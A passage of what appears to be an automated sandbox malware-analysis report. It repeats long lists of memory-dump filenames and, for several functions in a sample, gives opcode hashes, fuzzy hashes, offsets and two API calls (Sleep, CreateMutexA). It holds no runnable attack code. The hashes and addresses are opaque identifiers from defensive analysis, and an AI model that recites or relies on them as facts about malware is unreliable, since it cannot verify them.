Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6e37db3314f09db32de6d13aa915871b3ba67370618f42696421ad36719d3018
Instruction ID: f3968ea46515a648980dbc5cea3a18ba8d7b06321e1570f3acc5467aa7f3069e
Opcode Fuzzy Hash: 6e37db3314f09db32de6d13aa915871b3ba67370618f42696421ad36719d3018
Instruction Fuzzy Hash: 1C317B316842008BFB08EBBCDDD97AEB7A6EFC2314F20C21AE054973D5C77999808751

Function 009D9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ce2ae687b05639aa8a7c4f36be8e5f7732d7bc7de5967f263520161c7574cb98
Instruction ID: 2aa140a5da0b8336810df815833678c3a21b8c12f200921cc710cc1b827a1cf5
Opcode Fuzzy Hash: ce2ae687b05639aa8a7c4f36be8e5f7732d7bc7de5967f263520161c7574cb98
Instruction Fuzzy Hash: 233126316841409BEB08EBBCDD987ADB766EBC6314F20C61AF414EB3D1C7359D908752

Function 009DA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 8b5254ee73cbe99a09f9675a11c95127e45d4b4b768312662483b9f66bad4398
Instruction ID: 3d8322cebe36e646c765421272fab2101d991d1f89eec16ae09c28af81b516ea
Opcode Fuzzy Hash: 8b5254ee73cbe99a09f9675a11c95127e45d4b4b768312662483b9f66bad4398
Instruction Fuzzy Hash: 703168316841409BFB08DBB8DDD87ADB766EBC2314F24C31AE014A73D1C73AA9908752

Function 009DA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: bfcf41576e9c310a3177dfe2afab1098358ad9c3566225092f976dee59c43bb2
Instruction ID: df844b8215904136faa4437a800e57de69b6cdeba24e459d6c2f30c9df3df069
Opcode Fuzzy Hash: bfcf41576e9c310a3177dfe2afab1098358ad9c3566225092f976dee59c43bb2
Instruction Fuzzy Hash: D33168316841419BFB08DBBCDDD87AEB766AFC6310F20C21AE014A73D1C77AA9908752

Function 009DA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 67ea5e7d878ab5959082b7f7691af3d01c1a092827943d9cc0d681e742485b97
Instruction ID: ce0551973e05844d335ec1a77f2c33307084bf2cc474c14731647418841ad23d
Opcode Fuzzy Hash: 67ea5e7d878ab5959082b7f7691af3d01c1a092827943d9cc0d681e742485b97
Instruction Fuzzy Hash: 593148316841009BFB089BBCDDD9BAEB766EFC1314F20C21AF054A73E5C77599908652

Function 009DA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
